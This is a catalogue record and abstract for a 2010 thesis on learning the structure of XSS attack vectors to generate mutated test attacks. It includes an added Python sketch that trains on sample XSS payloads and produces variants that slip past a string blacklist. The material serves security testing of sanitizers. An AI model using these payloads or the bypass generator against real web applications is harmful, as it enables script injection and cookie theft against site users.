
Author: 王奕勛 (Yi-Hsun Wang)
Thesis Title: 利用攻擊向量的結構學習產生跨網站變形攻擊 (Structural Learning of Attack Vectors for Mutated XSS Attacks Generation)
Advisor: 李漢銘 (Hahn-Ming Lee)
Committee: 林豐澤 (Feng-Tse Lin), Jung-Ying Wang, Hsing-Kuo Pao
Degree: Master
Department: 電資學院 - 資訊工程系 (College of Electrical Engineering and Computer Science - Department of Computer Science and Information Engineering)
Thesis Publication Year: 2010
Graduation Academic Year: 98 (ROC calendar, i.e. the 2009-2010 academic year)
Language: English
Pages: 71
Keywords (in Chinese): 跨網站攻擊, 網站應用程式安全, 馬可夫模型, 貝氏理論, 變形攻擊 (cross-site attack, Web application security, Markov model, Bayes theory, mutation attack)
Keywords (in other languages): Web Security, XSS, HMM, Bayes theorem, Mutation

(1) automatically learn the structure of attack vectors, from the analysis of real data through to the modelling of a structural model of attack vectors; (2) mimic the composition techniques and elements of attack vectors to extend the testing capability of cross-site scripting vulnerability testing tools; (3) help verify the weaknesses of blacklist-based input filtering functions in Web applications.

Cross-site scripting (XSS) attacks on Web applications can bypass access control to gain elevated privileges, and they result from incomplete or incorrect input sanitization. Programmers and security experts alike identify XSS vulnerabilities either with automatic testing tools equipped with predefined attack vectors or with manually crafted attack vectors; both approaches lack a mutation mechanism that helps discover the diverse manifestations of potential vulnerabilities. Learning the structure of attack vectors could enrich the variety of manifestations in the generated XSS attacks used to identify XSS vulnerabilities.
In this study, we focus on generating threatening XSS attacks for state-of-the-art detection approaches that find potential XSS vulnerabilities in Web applications. We propose a structural learning mechanism that generates mutated XSS attacks fully automatically. Mutated XSS attack generation depends on the analysis of attack vectors and on the structural learning mechanism. At the kernel of the learning mechanism, a hidden Markov model (HMM) represents the structure of the attack vector model and captures the implicit manner of the attack vectors; these manners are derived from the syntactic meanings labelled by the proposed tokenizing mechanism. Bayes' Theorem is used to determine the number of hidden states in the model, which generalizes the attack vector model. We evaluate the proposed mechanism with Burp Intruder on a dataset collected from public XSS archives. The experimental results demonstrate that mutated XSS attack generation can identify potential
The proposed technique aims at testing Web applications by learning the elements and implicit structures that exist in XSS attacks. Furthermore, this method could increase the probability of finding XSS vulnerabilities in black-box or white-box testing. The contributions of this study are: (1) automatically learning the structure of attack vectors, from the analysis of practical data through to the modelling of a structural model of attack vectors; (2) mimicking the manners and elements of attack vectors to extend the ability of testing tools to identify XSS vulnerabilities; and (3) helping to verify the flaws of blacklist sanitization procedures in Web applications.
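To make the pipeline described in the abstract concrete, the following is an added, deliberately simplified Python sketch written for this page; it is not the thesis's code. It tokenizes attack vectors into labelled syntax classes, counts class-to-class transitions and per-class lexemes as a first-order Markov model (standing in for the thesis's HMM; the Bayesian choice of the number of hidden states is omitted, since here the states are simply the token classes), then random-walks the learned structure to emit mutated vectors and keeps the first one that a string blacklist misses, which is contribution (3) in miniature. The token classes, the six training vectors, the blacklist and the seed are all constructed for this illustration.

```python
"""Structural learning of XSS attack vectors, in miniature.

Added illustration for this page; it is not the thesis's code. The thesis
learns a hidden Markov model and picks the number of hidden states with
Bayes' theorem. Here the structure is a first-order Markov chain over
hand-labelled token classes, i.e. an HMM whose hidden states are the token
classes themselves, so the state count is fixed by the tokenizer. The token
classes, the training vectors and the blacklist are all assumptions.
"""
import random
import re
from collections import Counter, defaultdict

# Constructed training set in the style of public XSS archives (not the
# thesis dataset).
TRAINING_VECTORS = [
    '<script>alert(1)</script>',
    '<img src=x onerror=alert(1)>',
    '<svg onload=alert(document.cookie)>',
    '"><script>alert(document.cookie)</script>',
    "'><img src=x onerror=alert('xss')>",
    '<body onload=alert(1)>',
]

# Tokenizer: the first rule that matches at the current position labels the
# span with a syntax class (assumed class set; order matters, e.g. HANDLER
# must precede the generic ATTR rule).
TOKEN_RULES = [
    ('BREAK',     r'''["']>'''),        # quote+bracket that escapes an attribute
    ('TAG_CLOSE', r'</[A-Za-z]+>'),
    ('TAG_OPEN',  r'<[A-Za-z]+'),
    ('HANDLER',   r'on[A-Za-z]+='),     # event-handler attribute name
    ('PAYLOAD',   r'alert\([^)]*\)'),   # JavaScript payload
    ('ATTR',      r'[A-Za-z]+=\w+'),    # plain attribute such as src=x
    ('GT',        r'>'),
    ('WS',        r'\s+'),
    ('OTHER',     r'.'),                # anything the rules above miss
]
_SCANNER = re.compile('|'.join(f'(?P<{n}>{p})' for n, p in TOKEN_RULES))
START, END = '<s>', '</s>'


def tokenize(vector):
    """Label one attack vector as a list of (token class, lexeme) pairs."""
    return [(m.lastgroup, m.group()) for m in _SCANNER.finditer(vector)]


class AttackVectorModel:
    """Markov chain over token classes plus a lexeme table per class."""

    def __init__(self):
        self.transitions = defaultdict(Counter)  # class -> Counter(next class)
        self.emissions = defaultdict(Counter)    # class -> Counter(lexeme)

    def fit(self, vectors):
        """Count class transitions and per-class lexemes over the corpus."""
        for vector in vectors:
            prev = START
            for cls, lexeme in tokenize(vector):
                self.transitions[prev][cls] += 1
                self.emissions[cls][lexeme] += 1
                prev = cls
            self.transitions[prev][END] += 1
        return self

    @staticmethod
    def _draw(counter, rng):
        items, weights = zip(*counter.items())
        return rng.choices(items, weights=weights, k=1)[0]

    def generate(self, rng, max_tokens=16):
        """Random walk over the learned structure; returns one mutated vector."""
        out, cls = [], START
        for _ in range(max_tokens):
            cls = self._draw(self.transitions[cls], rng)
            if cls == END:
                break
            out.append(self._draw(self.emissions[cls], rng))
        return ''.join(out)


# Assumed blacklist filter standing in for a weak sanitizer under test.
BLACKLIST = ('<script', 'onerror', 'document.cookie')


def passes_blacklist(vector, blacklist=BLACKLIST):
    """True when the filter would let the vector through unchanged."""
    lowered = vector.lower()
    return not any(bad in lowered for bad in blacklist)


def mutate_until_bypass(model, seed=7, blacklist=BLACKLIST, attempts=500):
    """Generate mutations until one is new, still carries a payload and slips
    past the blacklist. Returns (vector, attempts used) or (None, attempts)."""
    rng = random.Random(seed)
    for i in range(1, attempts + 1):
        candidate = model.generate(rng)
        if (candidate not in TRAINING_VECTORS
                and 'alert(' in candidate
                and passes_blacklist(candidate, blacklist)):
            return candidate, i
    return None, attempts


if __name__ == '__main__':
    m = AttackVectorModel().fit(TRAINING_VECTORS)
    for cls, nxt in sorted(m.transitions.items()):
        print(cls, dict(nxt))
    print(mutate_until_bypass(m))
```

Running the file prints the learned transition table and one bypassing mutation. Every generated string recombines lexemes seen in training under the learned ordering of classes, so the output is never a copy of a training vector but keeps their shape (break-out prefix, tag, handler, payload); that is what lets it pass a string blacklist tuned to the originals, and it is also why the generated list can be fed to a tool such as Burp Intruder as a payload set.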

ABSTRACT  i
ACKNOWLEDGEMENTS  iii
1 Introduction  1
  1.1 Motivation  2
  1.2 Problem Definition and Goal  5
  1.3 Thesis Contribution  6
  1.4 The Outline of Thesis  7
2 Related Work  8
  2.1 Static Analysis  8
  2.2 Black-box Testing  10
  2.3 Hybrid Testing  12
3 Generation of Mutated XSS Attacks  14
  3.1 Attack Vector Tokenizer  15
    3.1.1 XSS Attack Locator  16
    3.1.2 Token Extractor  17
  3.2 Structural Learning of Attack Vectors  17
    3.2.1 Attack Vector Structure Learning  18
    3.2.2 Attack Vector Profile  20
  3.3 Mutated Attack Generator  20
4 Experiment and Results  22
  4.1 Experiment Design and Dataset  22
    4.1.1 Experiment Concept and Description  23
    4.1.2 Dataset Description  24
  4.2 Evaluation Metrics  26
  4.3 Numerical Results and Case Studies  27
  4.4 Discussion  31
5 Conclusion and Further Work  34
A Appendix  44
